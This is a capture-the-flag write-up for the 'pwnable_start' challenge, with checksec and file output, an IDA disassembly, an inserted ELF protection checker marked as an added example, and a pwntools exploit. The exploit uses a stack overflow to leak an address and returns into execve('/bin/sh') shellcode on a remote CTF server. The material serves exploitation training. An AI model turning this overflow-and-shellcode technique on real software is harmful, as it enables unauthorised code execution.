pwnable_start
Ubuntu 16. Source: https://github.com/bash-c/pwn_repo
0x01
checksec
[*] '/home/zelas/Desktop/pwn/pwnable_start/start'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
No protections are enabled, and the binary is statically linked:
└─$ file start
start: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
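An added example, not part of the original writeup: a small Python checker that derives the Arch, NX and PIE rows of the checksec output above directly from the ELF headers (e_machine, e_type and the PT_GNU_STACK program header). The two sample images are constructed inline; the real `start` binary can be passed as argv[1].

```python
import struct, sys

PT_GNU_STACK = 0x6474E551   # program header that records the stack's permissions
PF_X = 0x1                  # executable bit in p_flags
ET_EXEC, ET_DYN = 2, 3      # fixed-address executable vs position-independent (PIE)
EM_386, EM_X86_64 = 3, 62

def elf_protections(data: bytes) -> dict:
    """Derive arch, PIE and NX from a raw ELF image, the way checksec does."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64, little = data[4] == 2, data[5] == 1
    end = "<" if little else ">"
    e_type, e_machine = struct.unpack_from(end + "HH", data, 16)
    if is64:
        e_phoff, = struct.unpack_from(end + "Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 54)
        ph_fmt, flags_idx = end + "IIQQQQQQ", 1   # p_flags is the 2nd field in ELF64
    else:
        e_phoff, = struct.unpack_from(end + "I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 42)
        ph_fmt, flags_idx = end + "IIIIIIII", 6   # p_flags is the 7th field in ELF32
    stack_flags = None
    for i in range(e_phnum):
        fields = struct.unpack_from(ph_fmt, data, e_phoff + i * e_phentsize)
        if fields[0] == PT_GNU_STACK:
            stack_flags = fields[flags_idx]
    # Without a PT_GNU_STACK entry the loader falls back to an executable stack,
    # which is why a hand-linked binary like this one shows "NX disabled".
    nx = stack_flags is not None and not (stack_flags & PF_X)
    arch = {EM_386: "i386-32", EM_X86_64: "amd64-64"}.get(e_machine, f"machine-{e_machine}")
    arch += "-little" if little else "-big"
    return {"arch": arch, "pie": e_type == ET_DYN, "nx": nx}

def build_elf32(e_type: int, phdrs: list) -> bytes:
    """Constructed ELF32 LSB image carrying only the fields the checker reads."""
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8
    hdr = ident + struct.pack("<HHIIIIIHHHHHH", e_type, EM_386, 1, 0x8048060,
                              52, 0, 0, 52, 32, len(phdrs), 40, 0, 0)
    return hdr + b"".join(struct.pack("<IIIIIIII", t, 0, 0, 0, 0, 0, f, 0) for t, f in phdrs)

# Constructed samples: the first mirrors the start binary (ET_EXEC, no PT_GNU_STACK),
# the second is how a normally linked PIE with a non-executable stack looks.
PT_LOAD = 1
START_LIKE = build_elf32(ET_EXEC, [(PT_LOAD, 5)])
HARDENED = build_elf32(ET_DYN, [(PT_LOAD, 5), (PT_GNU_STACK, 6)])

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    print(elf_protections(open(target, "rb").read() if target else START_LIKE))
```

The canary and RELRO rows need symbol-table and dynamic-section parsing and are not covered here.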
IDA
.text:08048060                 public _start
.text:08048060 _start          proc near               ; DATA XREF: LOAD:08048018↑o
.text:08048060                 push    esp
.text:08048061                 push    offset _exit
.text:08048066                 xor     eax, eax
.text:08048068                 xor     ebx, ebx
.text:0804806A                 xor     ecx, ecx
.text:0804806C                 xor     edx, edx
.text:0804806E                 push    3A465443h
.text:08048073                 push    20656874h
.text:08048078                 push    20747261h
.text:0804807D                 push    74732073h
.text:08048082                 push    2774654Ch
.text:08048087                 mov     ecx, esp        ; addr
.text:08048089                 mov     dl, 14h         ; len
.text:0804808B                 mov     bl, 1           ; fd
.text:0804808D                 mov     al, 4
.text:0804808F                 int     80h             ; LINUX - sys_write
.text:08048091                 xor     ebx, ebx
.text:08048093                 mov     dl, 3Ch ; '<'
.text:08048095                 mov     al, 3
.text:08048097                 int     80h             ; LINUX - sys_read
.text:08048099                 add     esp, 14h        ; read(0, buf, 0x3c); after the add, buf = esp-0x14
.text:0804809C                 retn
.text:0804809C _start          endp                    ; sp-analysis failed
0x02
Approach
1. Overflow the 0x14-byte stack buffer to leak a stack address
2. Write shellcode onto the stack
3. Overflow again to jump to the shellcode
0x03
exp
from pwn import *

context(arch='i386', os='linux', log_level='debug')
path = './start'                      # local binary; use process(path) to debug locally
io = remote('node4.buuoj.cn', 29441)

padding = 0x14                        # distance from the buffer to the saved return address
write = 0x8048087                     # address of the write(1, esp, 0x14) sequence
payload = flat(b'a' * padding, write)
io.sendlineafter(b"Let's start the CTF:", payload)
stack = u32(io.recv(4))               # first 4 bytes written back are the saved esp
print('[+] stack_address -->', hex(stack))
shellcode = asm('xor ecx,ecx;xor edx,edx;push edx;push 0x68732f6e;push 0x69622f2f;mov ebx,esp;mov al,0xb;int 0x80')
payload = flat(b'a' * padding, stack + padding, shellcode)   # return into the shellcode placed right after the address
io.sendline(payload)
pause()
io.interactive()